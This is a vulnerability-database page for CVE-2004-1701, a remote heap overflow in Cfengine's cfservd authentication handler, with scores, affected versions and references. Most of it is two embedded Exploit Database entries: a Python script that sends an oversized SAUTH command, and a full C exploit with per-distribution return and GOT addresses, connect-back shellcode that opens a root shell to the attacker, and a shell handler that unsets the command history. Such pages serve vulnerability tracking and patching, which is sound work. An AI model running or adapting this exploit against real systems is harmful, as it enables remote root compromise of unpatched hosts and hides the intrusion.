CVE-2004-1701 : Detail

CVE-2004-1701

56.76%V4
Network
2005-02-21
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Heap-based buffer overflow in the AuthenticationDialogue function in cfservd for Cfengine 2.0.0 to 2.1.7p1 allows remote attackers to execute arbitrary code via a long SAUTH command during RSA authentication.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 24360

Publication date : 2004-08-08 22h00 +00:00
Author : Juan Pablo Martinez Kuhn
EDB Verified : Yes

source: https://www.securityfocus.com/bid/10899/info GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function. The issue exists due to a lack of sufficient boundary checks performed on challenge data that is received from a client. Because the size of the buffer, the size of data copied in a memcpy() operation, and the data copied are all controlled by the attacker, a remote attacker may likely exploit this condition to corrupt in-line heap based memory management data. cfservd employs an IP based access control method. This access control must be bypassed prior to exploitation. This may hinder exploitation attempts. This vulnerability is reported to affect versions 2.0.0 to 2.1.7p1 of cfengine cfservd. import struct import socket import time s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.1.1',5308) # CAUTH command p = 'k' # status p += '0000023' # len p += 'CAUTH ' # command p += 'HARE KRISHNA HARE' print 'sending CAUTH command...' s.send(p) # SAUTH command p = 'k' # status p += '0003000' # len p += 'SAUTH ' # command p += 'n' # iscrypt p += '00000010 ' # crypt_len p += '00001000' # nonce_len p += 'X' * 3000 print 'sending SAUTH command...' s.send(p) a = s.recv(4096) print a
Exploit Database EDB-ID : 24361

Publication date : 2004-08-08 22h00 +00:00
Author : jsk
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/10899/info GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function. The issue exists due to a lack of sufficient boundary checks performed on challenge data that is received from a client. Because the size of the buffer, the size of data copied in a memcpy() operation, and the data copied are all controlled by the attacker, a remote attacker may likely exploit this condition to corrupt in-line heap based memory management data. cfservd employs an IP based access control method. This access control must be bypassed prior to exploitation. This may hinder exploitation attempts. This vulnerability is reported to affect versions 2.0.0 to 2.1.7p1 of cfengine cfservd. /* _ ________ _____ ______ * * cfengine rsa heap remote exploit part of PTjob project / \ / "fuck mm" * by jsk:exworm(http://exworm.hostrocket.com) \/ * bug found by core * yep ta mei dayong ..hehe..so pub it.. * my home: www.ph4nt0m.org * GT: emm.oyxin.seal.ava.haggis.b_root.more.. * No girl No money No jop... * bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23 * cfengine rsa heap remote exploit ....s * --------------------------------------------------(need money.to..fk..girl..) * [+] lisntener... * [+] Connected, sending code... * [+] Ret: 0x0819f03e * [+] Got: 0x0811a590 * [+] ownedbyOseen! * ----------------------------------------------------------- * Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10 *(wheel) * * */ #include <stdio.h> #include <stdarg.h> #include <stdlib.h> #include <netdb.h> #include <net/if.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/time.h> #include <netinet/in.h> #include <getopt.h> #include <unistd.h> #include <string.h> #include <arpa/inet.h> #include <errno.h> #include <linux/sockios.h> #define BUF 1024 struct { char *distro; char *type; unsigned long ret; unsigned long got; } targets[] = { /*got is free of rsafree() ,get it by yourself to own more machine ;) */ { "Redhat 7.3 ", "cfengine 2.1.7p1 ",0x0819f03e , 0x0811a590 }, { "redhat 9.0 ", "cfengine 2.1.7p1", **********, ********** }, ( hehe:use fast-bin tips) { "Redhat 7.2 ", "cfengine 2.17p1 ", 0x080d1c78, 0x0806d0e3 }, { "Redhat 7.1 ", "cfengine 2.17p1", 0x080d11e0, 0x082bc090 }, { "Crash ", "(All platforms) ", 0x42424242, 0x41414141 }, }; char linux_connect_back[] = /* connect back 45295 */ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" "\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" "\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0" "\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03" "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" "\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89" "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; int sock; void usage(); void shell(); void usage(char *prog) { fprintf(stderr,"Usage: %s -t [-pah]\n",prog); fprintf(stderr,"-t version Linux version.\n"); fprintf(stderr,"-h target The host to attack.\n"); fprintf(stderr,"-a password Default password is \"sorry no password. \".\n"); fprintf(stderr,"-p port Default port is 5803.\n\n"); } int openhost(char *host,int port) { struct sockaddr_in addr; struct hostent *he; he=gethostbyname(host); if (he==NULL) return -1; sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); if (sock==-1) return -1; memcpy(&addr.sin_addr, he->h_addr, he->h_length); addr.sin_family=AF_INET; addr.sin_port=htons(port); if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1; return sock; } void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'\n"; int n; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); FD_SET(0, &fd_read); send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock, &fd_read); FD_SET(0, &fd_read); if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break; if (FD_ISSET(sock, &fd_read)) { if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){ fprintf(stderr, "[+] EOF\n"); exit(2); } if (write(1, buff, n) <0) break; } if (FD_ISSET(0, &fd_read)) { if ((n = read(0, buff, sizeof(buff))) < 0){ fprintf(stderr,"[+] EOF\n"); exit(2); } if (send(sock, buff, n, 0) < 0) break; } } fprintf(stderr,"[+] Connection lost.\n\n"); exit(0); } unsigned char *get_my_ip_addr(int sockfd, struct ifreq *ifr) { struct sockaddr_in sin; char *b = (char *) malloc(4); if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) { fprintf(stderr, "Unable to get the local IP Address, use -d.\n"); exit(1); } memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in)); memcpy(b, (char *) &sin.sin_addr.s_addr, 4); return b; } int main (int argc,char *argv[]) { char buf1[512]; char buf2[512]; char host[256]; char pass[256]="changeme"; char data; int type= 0; int c=0; int port=8001; char device[256] = "eth0"; unsigned char *ptr; struct hostent *hp; struct sockaddr_in sin_listener; struct ifreq ifr; struct timeval timeout; fd_set fdread; int delay = 12; int i = 0; int mode = 0; int local_port = 0; int opt = 0; int ret = 0; int sin_len = sizeof (struct sockaddr_in); int sock = 0; int sock2 = 0; int sockd = 0; int listener = 0; int time_out = 4; int tmp = 0; srand(getpid()); fprintf(stdout,"cfengine rsa heap remote exploit ....s\n"); fprintf(stdout,"--------------------------------------------------(need money.to..fk..girl..)\n"); while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF) { switch(c) { case 'p': port=atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr,"Invalid port.\n\n"); exit(1); } break; case 'a': memset(pass,0x0,sizeof(pass)); strncpy(pass,optarg,sizeof(pass) - 1); break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 28) { for(i = 0; i < sizeof(targets) / 28; i++) fprintf(stderr, "%02d. %s - %s [0x%08x - 0x%08x]\n", i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].got); return -1; } break; case 'h': memset(host,0x0,sizeof(host)); strncpy(host,optarg,sizeof(host) - 1); break; default: usage(argv[0]); exit(1); break; } } timeout.tv_sec = time_out; timeout.tv_usec = 0; if (strlen(host) == 0) { usage(argv[0]); exit(1); } sock=openhost(host, 5308); if (sock==-1) { fprintf(stderr,"- Unable to connect.\n\n"); exit(1); } strncpy(ifr.ifr_name, device, 15); if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) { fprintf(stderr, "socket() error.\n"); return -1; } if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { fprintf(stderr, "socket() error.\n"); return -1; } ptr = get_my_ip_addr(sockd, &ifr); memcpy(&sin_listener.sin_addr.s_addr, ptr, 4); sin_listener.sin_family = AF_INET; memset(&sin_listener.sin_zero, 0x00, 8); while(1) { local_port = local_port = 45295; sin_listener.sin_port = htons(local_port); if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break; } listen(listener, 1); fprintf(stdout, "[+] lisntener...\n"); linux_connect_back[33] = (unsigned int) *(ptr + 0); linux_connect_back[34] = (unsigned int) *(ptr + 1); linux_connect_back[35] = (unsigned int) *(ptr + 2); linux_connect_back[36] = (unsigned int) *(ptr + 3); memset(buf2, 0x0, sizeof(buf2)); memset(buf1, 0x90, sizeof(buf1)); for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i]; buf1[0] = (0x41414141 & 0x000000ff); buf1[1] = (0x41414141 & 0x0000ff00) >> 8; buf1[2] = (0x41414141 & 0x00ff0000) >> 16; buf1[3] = (0x41414141 & 0xff000000) >> 24; buf1[4] = (0x58585858 & 0x000000ff); buf1[5] = (0x58585858 & 0x0000ff00) >> 8; buf1[6] = (0x58585858 & 0x00ff0000) >> 16; buf1[7] = (0x58585858 & 0xff000000) >> 24; buf1[8] = (0xfffffffc & 0x000000ff); buf1[9] = (0xfffffffc & 0x0000ff00) >> 8; buf1[10] = (0xfffffffc & 0x00ff0000) >> 16; buf1[11] = (0xfffffffc & 0xff000000) >> 24; buf1[12] = (0xffffffff & 0x000000ff); buf1[13] = (0xffffffff & 0x0000ff00) >> 8; buf1[14] = (0xffffffff & 0x00ff0000) >> 16; buf1[15] = (0xffffffff & 0xff000000) >> 24; buf1[16] = (targets[type - 1].got -12 & 0x000000ff); buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8; buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16; buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24; buf1[20] = (targets[type - 1].ret & 0x000000ff); buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8; buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16; buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24; for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2) { buf1[i + 24] = 0x7f; buf1[i + 25] = 0xeb; } for(; i < 300 - sizeof(linux_connect_back) - 1; i++) buf1[i + 24] = 0x90; strcpy(buf1 + i + 24, linux_connect_back); buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\n'; buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\0'; sprintf(buf2, "k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH n00000010 00001000%s\r\n", buf1); fprintf(stdout, "Connected, sending code...\n"); fprintf(stdout, "[+] Ret: 0x%08x\n", targets[type - 1].ret); fprintf(stdout, "[+] Got: 0x%08x\n", targets[type - 1].got); while(1) { write(sock, buf2, strlen(buf2)); close(sock); sleep(2); FD_ZERO(&fdread); FD_SET(listener, &fdread); timeout.tv_sec = time_out; timeout.tv_usec = 0; while(1) { ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout); if (ret < 0) { close(sock); close(listener); fprintf(stderr, "select() error.\n"); return -1; } if (ret == 0) { fprintf(stderr, "[+] Failed, waiting %d seconds.\n" "[+] Use ctrl-c to abort.\n", delay); sleep(delay); break; } if(FD_ISSET(listener, &fdread)) { sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len); close(sock); close(listener); fprintf(stderr, "[+] ownedbyOseen!\n" "-----------------------------------------------------------\n"); shell(sock2); close(sock2); return 0; } } } fprintf(stderr, "[+] Exploit failed.\n"); close(listener); close(sock); return 0; }

Products Mentioned

Configuraton 0

Gnu>>Cfengine >> Version 2.0.0

Gnu>>Cfengine >> Version 2.0.1

Gnu>>Cfengine >> Version 2.0.2

Gnu>>Cfengine >> Version 2.0.3

Gnu>>Cfengine >> Version 2.0.4

Gnu>>Cfengine >> Version 2.0.5

Gnu>>Cfengine >> Version 2.0.5

    Gnu>>Cfengine >> Version 2.0.5

      Gnu>>Cfengine >> Version 2.0.5

        Gnu>>Cfengine >> Version 2.0.6

        Gnu>>Cfengine >> Version 2.0.7

        Gnu>>Cfengine >> Version 2.0.7

          Gnu>>Cfengine >> Version 2.0.7

            Gnu>>Cfengine >> Version 2.0.7

              Gnu>>Cfengine >> Version 2.0.8

              Gnu>>Cfengine >> Version 2.0.8

                Gnu>>Cfengine >> Version 2.1.0

                  Gnu>>Cfengine >> Version 2.1.0

                    Gnu>>Cfengine >> Version 2.1.0

                      Gnu>>Cfengine >> Version 2.1.7

                        References

                        http://marc.info/?l=bugtraq&m=109208394910086&w=2
                        Tags : mailing-list, x_refsource_BUGTRAQ
                        http://www.securityfocus.com/bid/10899
                        Tags : vdb-entry, x_refsource_BID
                        http://secunia.com/advisories/12251
                        Tags : third-party-advisory, x_refsource_SECUNIA
                        http://marc.info/?l=bugtraq&m=110886670528775&w=2
                        Tags : mailing-list, x_refsource_BUGTRAQ
                        http://security.gentoo.org/glsa/glsa-200408-08.xml
                        Tags : vendor-advisory, x_refsource_GENTOO